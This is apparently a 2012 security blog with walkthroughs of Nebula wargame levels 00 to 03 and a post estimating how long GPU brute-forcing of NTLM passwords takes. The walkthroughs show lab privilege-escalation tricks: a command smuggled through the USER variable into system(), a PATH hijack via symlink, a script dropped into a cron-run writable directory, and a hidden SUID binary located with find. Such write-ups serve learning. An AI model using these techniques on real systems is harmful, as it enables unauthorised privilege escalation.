01 December 2012

Exploit.Exercise.com - Nebula - Level03

I decided to try my hand at a war game over at Exploit Exercises. I figured it was a good way to keep my mind sharp. Before reading my spoilers you should give them a try yourself.

I was surprised how easy this level was. According to Exploit Exercises, Nebula Level03:
"Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes."

Checking out writable.sh, we see
$ cat ../writable.sh
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done

This script executes everything within the directory writable.d, then deletes it.

Let's create a script for cron to execute for us inside the writeable.d directory.
$ echo -e '#!/bin/bash\n/bin/getflag > /tmp/output.txt' > file.sh 
$ chmod 700 file.sh

The output of the getflag command usually produces
$ getflag is executing on a non-flag account, this doesn't count

However, once cron executes our script, it creates a file output.txt with the output from the getflag command.

$ cat /tmp/output.txt 
You have successfully executed getflag on a target account

There we go!

19 August 2012

Exploit.Exercise.com - Nebula - Level02

I decided to try my hand at a war game over at Exploit Exercises. I figured it was a good way to keep my mind sharp. Before reading my spoilers you should give them a try yourself.

Level02 is similar to Level01 in that it you don't need to know about C++ as much as you need to understand what is going on at the command line. You can see from the level02 code that it executes /bin/echo which prints the $USER variable. So, let's change the $USER variable to execute our getflag command.

There are 3 different ways to chain linux command together. I chose to use the ampersand (&).
$ USER="foo && /bin/getflag"
$ export USER
$ ./flag02
about to call system("/bin/echo foo && /bin/getflag is cool")
foo
You have successfully executed getflag on a target account

There you have it!

If you are still shady on why that worked, try this on your command line.
$ echo test1 && echo test2 && echo test3

18 August 2012

Exploit.Exercise.com - Nebula - Level01

I decided to try my hand at a war game over at Exploit Exercises. I figured it was a good way to keep my mind sharp. Before reading my spoilers you should give them a try yourself.

With level01 you don't need to know about programing in C++ as much as you do about how Linux calls binary commands. So, read the blurb over at Wikipedia about the $PATH variable. The whole point in how the $PATH variable effects Linux/Unix systems is that when a command needs to be executed; Linux/Unix needs to find where it is and the $PATH variable specifies where to look.

So, skimming through the source code shown on Nebula level01, you'll see that the program runs the echo command which prints out "and what now?". But remember what you read at Wikipedia about the $PATH variable? The only way to deliberately execute a command in a specific location is to use (./) . Therefore, as you can see by the source code, the echo command isn't being deliberately executed. It is being found using the $PATH variable and executed at the first instance it is located. What if there was another echo command somewhere else that we could point the $PATH variable too? Perhaps an echo command that we created...that ran the getflag binary for us :)

To do this, we create a symbolic link from the command echo (that we created) to the target binary: 'getflag'.

First, make sure we are in /home/flag01
$ cd ~
Now, create soft simlink
$ ln -s /bin/getflag echo
Then export the $PATH to update it.
export PATH=/home/level01:$PATH
Make sure it worked
echo $PATH
Finally, run flag01
$ /home/flag01/flag01
You have successfully executed getflag on a target account

13 August 2012

Exploit.Exercise.com - Nebula - Level00

I decided to try my hand at a war game over at Exploit Exercises. I figured it was a good way to keep my mind sharp. Before reading my spoilers you should give them a try yourself.

Level00 wants you to find a Set User ID program that is hidden in the filesystem. Level00 says that the SUID program runs as user 'flag00'.

The linux command find works really well for this task.

The level00 documentation gives us two clues about the file. It is executable and it runs as the 'flag00' user. From looking at the man page, we know we can find files with those criteria.

Running this command
[email protected]:~$ find / -user flag00 -executable -print
returns a bunch of permission errors.

So we run this to clean it up (send the errors to /dev/null)
[email protected]:~$ find / -user flag00 -executable -print 2> /dev/null
/home/flag00
/bin/.../flag00

Checking out /home/flag00 doesn't seem to show anything interesting
[email protected]:~$ ls -la /home/flag00
total 20
drwxr-x---  2 flag00 level00 4096 2011-11-20 20:21 .
drwxr-xr-x 43 root   root    4096 2011-11-20 20:21 ..
-rw-r--r--  1 flag00 flag00   220 2011-05-18 02:54 .bash_logout
-rw-r--r--  1 flag00 flag00  3353 2011-05-18 02:54 .bashrc
-rw-r--r--  1 flag00 flag00   675 2011-05-18 02:54 .profile

Let's check out
[email protected]:~$ ls -la /bin/.../flag00
-rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 /bin/.../flag00

There we go, its executable. Let's try it out.
[email protected]:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!

And finally we get what we came for...
[email protected]:~$ getflag
You have successfully executed getflag on a target account
[email protected]:~$

27 April 2012

The Brute Force Misconception

The Dream

Not long ago I was doing some research on the topic of brute forcing passwords. I was considering setting up a GPU farm to host a password cracking service.  Basically, people would submit password hashes and I would crack them.  For a price obviously. I envisioned making millions and getting government contracts.

Unfortunately I didn't get past the research and planning phase.

The Reality

Turns out that cracking a password takes forever, as in, longer than 10 minutes - and that makes it a poor business venture.  With the assistance of the fine gentleman over at Cryptohaze.com, I did some number crunching:

I wanted to crack NTLM (Windows).
I wanted to crack a full character space password - meaning all ASCII characters - which totals 95.
I wanted to crack a password that was at least 14 characters long.

Using Google Calculator I get: 95^14 = 4.87674979 × 1027 password combinations.  If you attended 8th grade you should know that that is an enormous number.

"Alright fine." I thought. "I'll just get a ton of GPUs to assist me with the cracking."

An Nvidia 580 card can crack ~2B NTLM passwords / sec. What if I had 1024 cards cracking all at once?

Google Calculator tells me: (95^14) / (2,000,000,000 * 1024) = 2.38122548 × 1015 = 75,508,164.8 years.

Yea, that is right about when my dream of striking it rich went out the window.

The Misconception?

Everybody knows that brute forcing passwords takes a long time, so you are probably wondering why I titled this article The Brute Force Misconception. Here's why:  in the last year or so password cracking has made huge leaps and bounds in terms of cracking speed. This can all be credited to the CUDA programming language allowing access to the massively paralleled Nvidia GPU. People have written programs that exponentially reduce the amount of time it takes to crack a password.  However, even a 10 character password would take nearly a year to crack. Doh!  Well, 1 year is less than 10,000, but still 1 year is a long time.

Granted, an 8 character password takes about a minute (with 1024 Nvidia 580's). However, 10 character passwords are becoming more and more common. AND who has a 1024 GPU farm setup?

In Closing

Weak passwords are easy to crack. That's a no brainer. But brute forcing passwords still takes too long. Don't buy expensive GPU password cracking programs:
http://www.insidepro.com/eng/egb.shtml
http://www.elcomsoft.com/distributed_password_recovery.html

You'll be dead and gone before your password is spit out in clear text.

Extra Notes

- Use LastPass - it's awesome.
- Check out Cryptohaze.com - it is an incredible GPU password cracker (with networking capabilities).
- Check out AtlasFolding.com if you are thinking of putting together a small GPU farm.